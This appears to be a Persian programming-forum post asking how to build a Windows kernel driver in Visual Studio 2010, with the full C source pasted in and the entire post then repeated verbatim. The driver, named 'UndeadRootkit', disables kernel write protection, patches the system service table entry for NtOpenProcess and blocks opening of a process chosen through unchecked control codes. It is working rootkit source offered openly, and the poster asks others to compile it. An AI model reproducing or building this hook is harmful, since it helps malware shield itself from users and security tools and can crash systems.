بهروز عباسی
شنبه 26 اسفند 1391, 23:01 عصر
درود به همه:لبخند:
من باید یک درایور رو در VS 2010 کامپایل کنم ولی نمیدونم چطوری (قبلاً با 2008 مشکلی نبود از یک فایل bat استفاده می کردم الان اسمش یادم نیست:عصبانی:)
سایت رو زیر و رو کردم ولی به نتیجه‌ای نرسیدم، بجز چندتا تاپیک که توی همه‌شون Inprise (http://barnamenevis.org/member.php?1341-Inprise) به DDKWizard (http://ddkwizard.assarbad.net) اشاره کرده بود؛ امّا متأسفانه ظاهراً DDKWizard (http://ddkwizard.assarbad.net) برای نسخهٔ 2010 به‌روزرسانی نشده و البته نصب هم نشد.
سورس رو میذارم اینجا لطفا راهنمایی کنید :
یا اگه کسی به WDK(DDK ) دسترسی داره لطفاً برام کامپایل کنه.:قلب:
#include "E:\WinDDK\7600.16385.1\inc\ddk\Ntddk.h"
#include "ntifs.h"
// IOCTL codes handled by IOControll(): install the hook, remove it, and set the
// protected process by image name. All three are METHOD_BUFFERED, so a single
// SystemBuffer carries both input and output, and FILE_ANY_ACCESS means the
// I/O manager performs no access check on the control code itself.
#define IO_HOOK_FUNCTIONS CTL_CODE(FILE_DEVICE_UNKNOWN, 0x0001, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IO_UNHOOK_FUNCTIONS CTL_CODE(FILE_DEVICE_UNKNOWN, 0x0002, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IO_GETSETINFO CTL_CODE(FILE_DEVICE_UNKNOWN, 0x0003, METHOD_BUFFERED, FILE_ANY_ACCESS)
//Global Variables
// Device and symbolic-link names: initialised in DriverEntry(), removed in OnUnload().
UNICODE_STRING DeviceName, DeviceLink;
// PID that NewNtOpenProcess() refuses to open; (HANDLE)-1 means "none set".
HANDLE UserLandProcessID = (HANDLE)-1;
// Function callnumbers
// SSDT index of NtOpenProcess. Hard-coded, and the index differs between
// Windows versions, so on a different build this patches some other service.
ULONG NtOpenProcess_callnumber = 0x007a;
//Function Prototypes
NTKERNELAPI HANDLE PsGetProcessId(IN PEPROCESS Process);
NTSTATUS __stdcall IOControll(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);
void HookFunctions( void );
void UnHookFunctions( void );
HANDLE RetrivePID( char* );
// Function signatures
// Type of the original NtOpenProcess entry. Declared as returning ULONG here
// even though its result is stored into an NTSTATUS in NewNtOpenProcess().
typedef ULONG (*NTOPENPROCESS)(OUT PHANDLE ProcessHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes, IN PCLIENT_ID ClientId OPTIONAL);
// Function holders
// Original SSDT entry, saved by HookFunctions() and restored by UnHookFunctions().
// Starts out NULL, so UnHookFunctions() before HookFunctions() stores NULL.
NTOPENPROCESS OldNtOpenProcess;
// Masks interrupts on the current processor (cli) and clears CR0.WP
// (bit 16, 0x10000) so that read-only kernel pages - the service table among
// them - accept stores. 32-bit x86 inline assembly only. Naked function: the
// compiler emits no prologue or epilogue, and no explicit 'ret' is written
// here either, so nothing returns control to the caller.
void __declspec(naked) __stdcall UnProtect( void )
{
__asm
{
cli                     ; interrupts off on this CPU only, not system-wide
mov eax, CR0
and eax, not 10000H     ; clear WP (bit 16)
mov CR0, eax
}
}
// Counterpart of UnProtect(): sets CR0.WP (bit 16) again so read-only kernel
// pages are protected, then re-enables interrupts (sti). 32-bit x86 inline
// assembly only. Naked function with no prologue/epilogue and, as written,
// no explicit 'ret'.
void __declspec(naked) __stdcall Protect( void )
{
__asm
{
mov eax, CR0
OR eax, 10000h          ; set WP (bit 16)
mov CR0, eax
sti                     ; interrupts back on for this CPU
}
}
// Replacement installed into the SSDT slot of NtOpenProcess by HookFunctions().
// A request whose ClientId->UniqueProcess equals UserLandProcessID fails with
// STATUS_ACCESS_DENIED; every other request is forwarded to the saved original
// entry (OldNtOpenProcess) and its status is returned unchanged.
// ClientId is OPTIONAL in the real service contract but is dereferenced
// unconditionally here, so a caller that passes NULL faults in kernel mode.
NTSTATUS NewNtOpenProcess(OUT PHANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId OPTIONAL)
{
// Initial value is never observed: both branches below overwrite or return.
NTSTATUS ntStatus = STATUS_INVALID_PARAMETER;
if ( ClientId->UniqueProcess == UserLandProcessID )
return STATUS_ACCESS_DENIED;
else
// ULONG result of the original stored into NTSTATUS (signed LONG).
ntStatus = ((NTOPENPROCESS)(OldNtOpenProcess))(ProcessHandle, DesiredAccess, ObjectAttributes, ClientId);
return ntStatus;
}
// Writes the saved original address back into the SSDT slot for NtOpenProcess.
// Assumes HookFunctions() ran first; otherwise OldNtOpenProcess is still NULL
// and the service entry is set to NULL. Write protection is lifted only around
// the store. KeServiceDescriptorTable is not declared by either header included
// above - presumably supplied elsewhere; confirm. Assigning to a cast expression
// is not valid standard C (older MSVC accepted it as an extension).
void UnHookFunctions( void )
{
UnProtect();
// Restore original function address
(NTOPENPROCESS)KeServiceDescriptorTable->ServiceTable[NtOpenProcess_callnumber] = OldNtOpenProcess;
Protect();
}
// Saves the current SSDT entry for NtOpenProcess and replaces it with
// NewNtOpenProcess. Not idempotent: a second call stores the hook's own
// address in OldNtOpenProcess, after which NewNtOpenProcess forwards to
// itself. Nothing synchronises the read-modify-write against other processors
// that may be dispatching the same service at that moment.
void HookFunctions( void )
{
// Store original functions
OldNtOpenProcess = (NTOPENPROCESS)KeServiceDescriptorTable->ServiceTable[NtOpenProcess_callnumber];
UnProtect();
// Hook Functions (assignment to a cast expression: MSVC extension, not standard C)
(NTOPENPROCESS)KeServiceDescriptorTable->ServiceTable[NtOpenProcess_callnumber] = &NewNtOpenProcess;
Protect();
}
// Looks a process up by image name and returns its PID, or (HANDLE)-1 when
// nothing matches. The walk follows EPROCESS.ActiveProcessLinks starting from
// the *calling* process (PsGetCurrentProcess), not from the System process as
// the log message below suggests. The comparison is a case-insensitive prefix
// match of strlen(ProcessName) bytes against EPROCESS.ImageFileName, so the
// first process whose name starts with ProcessName wins.
// ProcessName is the raw IOCTL input buffer; it is assumed NUL-terminated and
// its length is never checked. Relies on undocumented EPROCESS field layout.
HANDLE RetrivePID( char* ProcessName )
{
PEPROCESS PeProcess = NULL;
PLIST_ENTRY pNextEntry, pListHead;
PeProcess = PsGetCurrentProcess();
if(!PeProcess)
{
DbgPrint( "[ALARM] -> Cannot find 'System' process!" );
return (HANDLE)-1;
}
if( IsListEmpty( &PeProcess->ActiveProcessLinks ) )
DbgPrint("[ALARM] -> No processes found!");
else
{
pListHead = &PeProcess->ActiveProcessLinks;
pNextEntry = pListHead->Flink;
// No lock is taken on the process list, so a process being created or
// torn down concurrently may be unlinked while this loop is on it.
while(pNextEntry != pListHead)
{
PeProcess = CONTAINING_RECORD( pNextEntry,EPROCESS,ActiveProcessLinks );
// Only processes with a non-zero thread count and a non-empty thread
// list are compared by name (unbraced nested ifs).
if(PeProcess->ActiveThreads)
if( !IsListEmpty( &PeProcess->ThreadListHead ) )
if( _strnicmp( PeProcess->ImageFileName, ProcessName ,strlen(ProcessName) ) == 0 )
return PsGetProcessId( PeProcess );
PeProcess = NULL; // no effect: reassigned at the top of the next iteration
pNextEntry = pNextEntry->Flink;
}
}
return (HANDLE)-1;
}
// IRP_MJ_DEVICE_CONTROL dispatch. All three codes are METHOD_BUFFERED, so
// Irp->AssociatedIrp.SystemBuffer is both the input and the output buffer.
// Each recognised code writes an int back into that buffer:
// 0 = hook installed, 1 = hook removed, 2 = protected PID (re)set.
// Neither Parameters.DeviceIoControl.InputBufferLength nor OutputBufferLength
// is checked before the buffer is read as a C string (IO_GETSETINFO) or
// written with sizeof(int) bytes, and Irp->IoStatus.Status is never set.
// Every request, including an unrecognised control code, completes and the
// routine reports STATUS_SUCCESS.
NTSTATUS __stdcall IOControll(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
NTSTATUS status = STATUS_SUCCESS;
int FunctionStatus = -1;
// Current stack location is read directly rather than via
// IoGetCurrentIrpStackLocation().
switch (Irp->Tail.Overlay.CurrentStackLocation->Parameters.DeviceIoControl.IoControlCode)
{
case IO_HOOK_FUNCTIONS:
FunctionStatus = 0;
Irp->IoStatus.Information = sizeof(int);
memcpy(Irp->AssociatedIrp.SystemBuffer, &FunctionStatus, sizeof(int));
DbgPrint("Hooking...\n");
HookFunctions();
break;
case IO_UNHOOK_FUNCTIONS:
FunctionStatus = 1;
Irp->IoStatus.Information = sizeof(int);
memcpy(Irp->AssociatedIrp.SystemBuffer, &FunctionStatus, sizeof(int));
DbgPrint("Unhooking...\n");
UnHookFunctions();
break;
case IO_GETSETINFO:
FunctionStatus = 2;
// Input buffer is handed to RetrivePID() as a string with no length check.
UserLandProcessID = RetrivePID( (char*)Irp->AssociatedIrp.SystemBuffer );
//DbgPrint("Process ID of %s %i", (char*)Irp->AssociatedIrp.SystemBuffer, UserLandProcessID);
// HANDLE printed with %i; only matches where HANDLE is int-sized (32-bit).
DbgPrint("Process ID: %i", UserLandProcessID);
Irp->IoStatus.Information = sizeof(int);
memcpy(Irp->AssociatedIrp.SystemBuffer, &FunctionStatus, sizeof(int));
break;
}
// No default case: unknown codes reach here with IoStatus.Information not set.
IofCompleteRequest(Irp, IO_NO_INCREMENT);
return status;
}
// IRP_MJ_CREATE / IRP_MJ_CLOSE dispatch. Nothing is set up or torn down per
// handle, so the request is completed immediately and reported as successful.
NTSTATUS __stdcall IOOpenClose(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
    const NTSTATUS result = STATUS_SUCCESS;

    UNREFERENCED_PARAMETER(DeviceObject);

    /* No priority boost: no waiter was blocked on real I/O here. */
    IofCompleteRequest(Irp, IO_NO_INCREMENT);
    return result;
}
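// Driver unload routine: removes the symbolic link and the device object that
// DriverEntry() created. The SSDT entry is not restored here: if the hook is
// still installed when the driver unloads, the service table keeps pointing at
// code that is about to be unmapped.
VOID OnUnload(IN PDRIVER_OBJECT DriverObject)
{
    DbgPrint("Unloading!\n");
    IoDeleteSymbolicLink(&DeviceLink);
    /* DriverObject->DeviceObject is the single device created in DriverEntry(). */
    IoDeleteDevice(DriverObject->DeviceObject);
    /* The trailing expression statement that merely read DriverObject->DriverUnload
       had no effect and has been removed. */
}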
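// Driver entry point.
// Creates the control device \Device\UndeadRootkit with a \DosDevices alias and
// installs the dispatch routines. The device carries no exclusive flag and the
// IOCTLs are FILE_ANY_ACCESS, so any local caller that can open the link can
// issue them.
// Returns STATUS_SUCCESS, or the failing status of IoCreateDevice /
// IoCreateSymbolicLink. On link failure the device is deleted before returning.
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING theRegistryPath)
{
    NTSTATUS ntStatus;
    PDEVICE_OBJECT pDeviceObject = NULL;

    UNREFERENCED_PARAMETER(theRegistryPath);

    RtlInitUnicodeString(&DeviceName, L"\\Device\\UndeadRootkit");
    ntStatus = IoCreateDevice(DriverObject, 0, &DeviceName, FILE_DEVICE_UNKNOWN, 0, FALSE, &pDeviceObject);
    if (!NT_SUCCESS(ntStatus)) {
        return ntStatus;
    }

    RtlInitUnicodeString(&DeviceLink, L"\\DosDevices\\UndeadRootkit");
    ntStatus = IoCreateSymbolicLink(&DeviceLink, &DeviceName);
    if (!NT_SUCCESS(ntStatus)) {
        /* Propagate the real failure. Returning STATUS_OBJECT_NAME_EXISTS here,
           as before, is wrong: that is an informational code for which
           NT_SUCCESS() is true, so the I/O manager treated a driver whose
           device had just been deleted as successfully loaded. */
        IoDeleteDevice(pDeviceObject);
        return ntStatus;
    }

    DriverObject->DriverUnload = OnUnload;
    DriverObject->MajorFunction[IRP_MJ_CREATE] = &IOOpenClose;
    DriverObject->MajorFunction[IRP_MJ_CLOSE] = &IOOpenClose;
    DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = &IOControll;
    return STATUS_SUCCESS;
}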
من باید یک درایور رو در VS 2010 کامپایل کنم ولی نمیدونم چطوری (قبلاً با 2008 مشکلی نبود از یک فایل bat استفاده می کردم الان اسمش یادم نیست:عصبانی:)
سایت رو زیر و رو کردم ولی به نتیجه‌ای نرسیدم، بجز چندتا تاپیک که توی همه‌شون Inprise (http://barnamenevis.org/member.php?1341-Inprise) به DDKWizard (http://ddkwizard.assarbad.net) اشاره کرده بود؛ امّا متأسفانه ظاهراً DDKWizard (http://ddkwizard.assarbad.net) برای نسخهٔ 2010 به‌روزرسانی نشده و البته نصب هم نشد.
سورس رو میذارم اینجا لطفا راهنمایی کنید :
یا اگه کسی به WDK(DDK ) دسترسی داره لطفاً برام کامپایل کنه.:قلب:
#include "E:\WinDDK\7600.16385.1\inc\ddk\Ntddk.h"
#include "ntifs.h"
// IOCTL codes handled by IOControll(): install the hook, remove it, and set the
// protected process by image name. All three are METHOD_BUFFERED, so a single
// SystemBuffer carries both input and output, and FILE_ANY_ACCESS means the
// I/O manager performs no access check on the control code itself.
#define IO_HOOK_FUNCTIONS CTL_CODE(FILE_DEVICE_UNKNOWN, 0x0001, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IO_UNHOOK_FUNCTIONS CTL_CODE(FILE_DEVICE_UNKNOWN, 0x0002, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IO_GETSETINFO CTL_CODE(FILE_DEVICE_UNKNOWN, 0x0003, METHOD_BUFFERED, FILE_ANY_ACCESS)
//Global Variables
// Device and symbolic-link names: initialised in DriverEntry(), removed in OnUnload().
UNICODE_STRING DeviceName, DeviceLink;
// PID that NewNtOpenProcess() refuses to open; (HANDLE)-1 means "none set".
HANDLE UserLandProcessID = (HANDLE)-1;
// Function callnumbers
// SSDT index of NtOpenProcess. Hard-coded, and the index differs between
// Windows versions, so on a different build this patches some other service.
ULONG NtOpenProcess_callnumber = 0x007a;
//Function Prototypes
NTKERNELAPI HANDLE PsGetProcessId(IN PEPROCESS Process);
NTSTATUS __stdcall IOControll(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);
void HookFunctions( void );
void UnHookFunctions( void );
HANDLE RetrivePID( char* );
// Function signatures
// Type of the original NtOpenProcess entry. Declared as returning ULONG here
// even though its result is stored into an NTSTATUS in NewNtOpenProcess().
typedef ULONG (*NTOPENPROCESS)(OUT PHANDLE ProcessHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes, IN PCLIENT_ID ClientId OPTIONAL);
// Function holders
// Original SSDT entry, saved by HookFunctions() and restored by UnHookFunctions().
// Starts out NULL, so UnHookFunctions() before HookFunctions() stores NULL.
NTOPENPROCESS OldNtOpenProcess;
// Masks interrupts on the current processor (cli) and clears CR0.WP
// (bit 16, 0x10000) so that read-only kernel pages - the service table among
// them - accept stores. 32-bit x86 inline assembly only. Naked function: the
// compiler emits no prologue or epilogue, and no explicit 'ret' is written
// here either, so nothing returns control to the caller.
void __declspec(naked) __stdcall UnProtect( void )
{
__asm
{
cli                     ; interrupts off on this CPU only, not system-wide
mov eax, CR0
and eax, not 10000H     ; clear WP (bit 16)
mov CR0, eax
}
}
// Counterpart of UnProtect(): sets CR0.WP (bit 16) again so read-only kernel
// pages are protected, then re-enables interrupts (sti). 32-bit x86 inline
// assembly only. Naked function with no prologue/epilogue and, as written,
// no explicit 'ret'.
void __declspec(naked) __stdcall Protect( void )
{
__asm
{
mov eax, CR0
OR eax, 10000h          ; set WP (bit 16)
mov CR0, eax
sti                     ; interrupts back on for this CPU
}
}
// Replacement installed into the SSDT slot of NtOpenProcess by HookFunctions().
// A request whose ClientId->UniqueProcess equals UserLandProcessID fails with
// STATUS_ACCESS_DENIED; every other request is forwarded to the saved original
// entry (OldNtOpenProcess) and its status is returned unchanged.
// ClientId is OPTIONAL in the real service contract but is dereferenced
// unconditionally here, so a caller that passes NULL faults in kernel mode.
NTSTATUS NewNtOpenProcess(OUT PHANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId OPTIONAL)
{
// Initial value is never observed: both branches below overwrite or return.
NTSTATUS ntStatus = STATUS_INVALID_PARAMETER;
if ( ClientId->UniqueProcess == UserLandProcessID )
return STATUS_ACCESS_DENIED;
else
// ULONG result of the original stored into NTSTATUS (signed LONG).
ntStatus = ((NTOPENPROCESS)(OldNtOpenProcess))(ProcessHandle, DesiredAccess, ObjectAttributes, ClientId);
return ntStatus;
}
// Writes the saved original address back into the SSDT slot for NtOpenProcess.
// Assumes HookFunctions() ran first; otherwise OldNtOpenProcess is still NULL
// and the service entry is set to NULL. Write protection is lifted only around
// the store. KeServiceDescriptorTable is not declared by either header included
// above - presumably supplied elsewhere; confirm. Assigning to a cast expression
// is not valid standard C (older MSVC accepted it as an extension).
void UnHookFunctions( void )
{
UnProtect();
// Restore original function address
(NTOPENPROCESS)KeServiceDescriptorTable->ServiceTable[NtOpenProcess_callnumber] = OldNtOpenProcess;
Protect();
}
// Saves the current SSDT entry for NtOpenProcess and replaces it with
// NewNtOpenProcess. Not idempotent: a second call stores the hook's own
// address in OldNtOpenProcess, after which NewNtOpenProcess forwards to
// itself. Nothing synchronises the read-modify-write against other processors
// that may be dispatching the same service at that moment.
void HookFunctions( void )
{
// Store original functions
OldNtOpenProcess = (NTOPENPROCESS)KeServiceDescriptorTable->ServiceTable[NtOpenProcess_callnumber];
UnProtect();
// Hook Functions (assignment to a cast expression: MSVC extension, not standard C)
(NTOPENPROCESS)KeServiceDescriptorTable->ServiceTable[NtOpenProcess_callnumber] = &NewNtOpenProcess;
Protect();
}
// Looks a process up by image name and returns its PID, or (HANDLE)-1 when
// nothing matches. The walk follows EPROCESS.ActiveProcessLinks starting from
// the *calling* process (PsGetCurrentProcess), not from the System process as
// the log message below suggests. The comparison is a case-insensitive prefix
// match of strlen(ProcessName) bytes against EPROCESS.ImageFileName, so the
// first process whose name starts with ProcessName wins.
// ProcessName is the raw IOCTL input buffer; it is assumed NUL-terminated and
// its length is never checked. Relies on undocumented EPROCESS field layout.
HANDLE RetrivePID( char* ProcessName )
{
PEPROCESS PeProcess = NULL;
PLIST_ENTRY pNextEntry, pListHead;
PeProcess = PsGetCurrentProcess();
if(!PeProcess)
{
DbgPrint( "[ALARM] -> Cannot find 'System' process!" );
return (HANDLE)-1;
}
if( IsListEmpty( &PeProcess->ActiveProcessLinks ) )
DbgPrint("[ALARM] -> No processes found!");
else
{
pListHead = &PeProcess->ActiveProcessLinks;
pNextEntry = pListHead->Flink;
// No lock is taken on the process list, so a process being created or
// torn down concurrently may be unlinked while this loop is on it.
while(pNextEntry != pListHead)
{
PeProcess = CONTAINING_RECORD( pNextEntry,EPROCESS,ActiveProcessLinks );
// Only processes with a non-zero thread count and a non-empty thread
// list are compared by name (unbraced nested ifs).
if(PeProcess->ActiveThreads)
if( !IsListEmpty( &PeProcess->ThreadListHead ) )
if( _strnicmp( PeProcess->ImageFileName, ProcessName ,strlen(ProcessName) ) == 0 )
return PsGetProcessId( PeProcess );
PeProcess = NULL; // no effect: reassigned at the top of the next iteration
pNextEntry = pNextEntry->Flink;
}
}
return (HANDLE)-1;
}
// IRP_MJ_DEVICE_CONTROL dispatch. All three codes are METHOD_BUFFERED, so
// Irp->AssociatedIrp.SystemBuffer is both the input and the output buffer.
// Each recognised code writes an int back into that buffer:
// 0 = hook installed, 1 = hook removed, 2 = protected PID (re)set.
// Neither Parameters.DeviceIoControl.InputBufferLength nor OutputBufferLength
// is checked before the buffer is read as a C string (IO_GETSETINFO) or
// written with sizeof(int) bytes, and Irp->IoStatus.Status is never set.
// Every request, including an unrecognised control code, completes and the
// routine reports STATUS_SUCCESS.
NTSTATUS __stdcall IOControll(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
NTSTATUS status = STATUS_SUCCESS;
int FunctionStatus = -1;
// Current stack location is read directly rather than via
// IoGetCurrentIrpStackLocation().
switch (Irp->Tail.Overlay.CurrentStackLocation->Parameters.DeviceIoControl.IoControlCode)
{
case IO_HOOK_FUNCTIONS:
FunctionStatus = 0;
Irp->IoStatus.Information = sizeof(int);
memcpy(Irp->AssociatedIrp.SystemBuffer, &FunctionStatus, sizeof(int));
DbgPrint("Hooking...\n");
HookFunctions();
break;
case IO_UNHOOK_FUNCTIONS:
FunctionStatus = 1;
Irp->IoStatus.Information = sizeof(int);
memcpy(Irp->AssociatedIrp.SystemBuffer, &FunctionStatus, sizeof(int));
DbgPrint("Unhooking...\n");
UnHookFunctions();
break;
case IO_GETSETINFO:
FunctionStatus = 2;
// Input buffer is handed to RetrivePID() as a string with no length check.
UserLandProcessID = RetrivePID( (char*)Irp->AssociatedIrp.SystemBuffer );
//DbgPrint("Process ID of %s %i", (char*)Irp->AssociatedIrp.SystemBuffer, UserLandProcessID);
// HANDLE printed with %i; only matches where HANDLE is int-sized (32-bit).
DbgPrint("Process ID: %i", UserLandProcessID);
Irp->IoStatus.Information = sizeof(int);
memcpy(Irp->AssociatedIrp.SystemBuffer, &FunctionStatus, sizeof(int));
break;
}
// No default case: unknown codes reach here with IoStatus.Information not set.
IofCompleteRequest(Irp, IO_NO_INCREMENT);
return status;
}
// IRP_MJ_CREATE / IRP_MJ_CLOSE dispatch. Nothing is set up or torn down per
// handle, so the request is completed immediately and reported as successful.
NTSTATUS __stdcall IOOpenClose(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
    const NTSTATUS result = STATUS_SUCCESS;

    UNREFERENCED_PARAMETER(DeviceObject);

    /* No priority boost: no waiter was blocked on real I/O here. */
    IofCompleteRequest(Irp, IO_NO_INCREMENT);
    return result;
}
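// Driver unload routine: removes the symbolic link and the device object that
// DriverEntry() created. The SSDT entry is not restored here: if the hook is
// still installed when the driver unloads, the service table keeps pointing at
// code that is about to be unmapped.
VOID OnUnload(IN PDRIVER_OBJECT DriverObject)
{
    DbgPrint("Unloading!\n");
    IoDeleteSymbolicLink(&DeviceLink);
    /* DriverObject->DeviceObject is the single device created in DriverEntry(). */
    IoDeleteDevice(DriverObject->DeviceObject);
    /* The trailing expression statement that merely read DriverObject->DriverUnload
       had no effect and has been removed. */
}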
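// Driver entry point.
// Creates the control device \Device\UndeadRootkit with a \DosDevices alias and
// installs the dispatch routines. The device carries no exclusive flag and the
// IOCTLs are FILE_ANY_ACCESS, so any local caller that can open the link can
// issue them.
// Returns STATUS_SUCCESS, or the failing status of IoCreateDevice /
// IoCreateSymbolicLink. On link failure the device is deleted before returning.
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING theRegistryPath)
{
    NTSTATUS ntStatus;
    PDEVICE_OBJECT pDeviceObject = NULL;

    UNREFERENCED_PARAMETER(theRegistryPath);

    RtlInitUnicodeString(&DeviceName, L"\\Device\\UndeadRootkit");
    ntStatus = IoCreateDevice(DriverObject, 0, &DeviceName, FILE_DEVICE_UNKNOWN, 0, FALSE, &pDeviceObject);
    if (!NT_SUCCESS(ntStatus)) {
        return ntStatus;
    }

    RtlInitUnicodeString(&DeviceLink, L"\\DosDevices\\UndeadRootkit");
    ntStatus = IoCreateSymbolicLink(&DeviceLink, &DeviceName);
    if (!NT_SUCCESS(ntStatus)) {
        /* Propagate the real failure. Returning STATUS_OBJECT_NAME_EXISTS here,
           as before, is wrong: that is an informational code for which
           NT_SUCCESS() is true, so the I/O manager treated a driver whose
           device had just been deleted as successfully loaded. */
        IoDeleteDevice(pDeviceObject);
        return ntStatus;
    }

    DriverObject->DriverUnload = OnUnload;
    DriverObject->MajorFunction[IRP_MJ_CREATE] = &IOOpenClose;
    DriverObject->MajorFunction[IRP_MJ_CLOSE] = &IOOpenClose;
    DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = &IOControll;
    return STATUS_SUCCESS;
}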